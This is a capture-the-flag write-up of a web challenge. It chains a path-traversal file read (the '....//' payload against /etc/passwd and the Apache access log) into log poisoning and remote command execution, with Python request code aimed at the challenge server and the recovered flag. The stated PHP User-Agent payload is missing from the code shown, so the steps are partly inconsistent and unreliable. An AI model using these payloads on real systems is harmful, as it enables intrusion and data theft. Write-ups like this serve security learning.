Tags: web 

Rating:

First stage - LFI:
After trying multiple payloads, double encoding technique worked:
```
....//....//....//....//etc//passwd
```
displays the file content properly. But nothing suspicious.

After trying to read multiple files, discovered that by accessing:
```
....//....//....//....//var//log//apache2//access.log
```
we can see the requests coming to the apache server.

In order to receive RCE,
We will apply two requests:

```
requests.get(f"http://35.239.30.169/AAA",
headers={"User-Agent": "Mozilla 5.0 Firefox/78.0"})

response = requests.post(f"http://35.239.30.169?cmd=ls -l /",
data={"class": f"....//....//....//....//var//log//apache2//access.log"})

print(response.text)
```

This first request will log the request to a non existing page, but sending a php command under the user agent.
The second request, calling to the access.log file by the PHP interpreter will cause the php code to execute, by providing the parameter which is the command.

The first command: ls -l / reveals a suspicious file on the root directory: `ee60eb16150ad87d3c0180e53b379105650fc5db240bc8b0842526c85a86e317.txt`
The second command to read its content: `cat ../../../../ee60eb16150ad87d3c0180e53b379105650fc5db240bc8b0842526c85a86e317.txt`
And the flag is revealed: `accessdenied{lf1_t0_rc3_4r3_th3_b3s7}`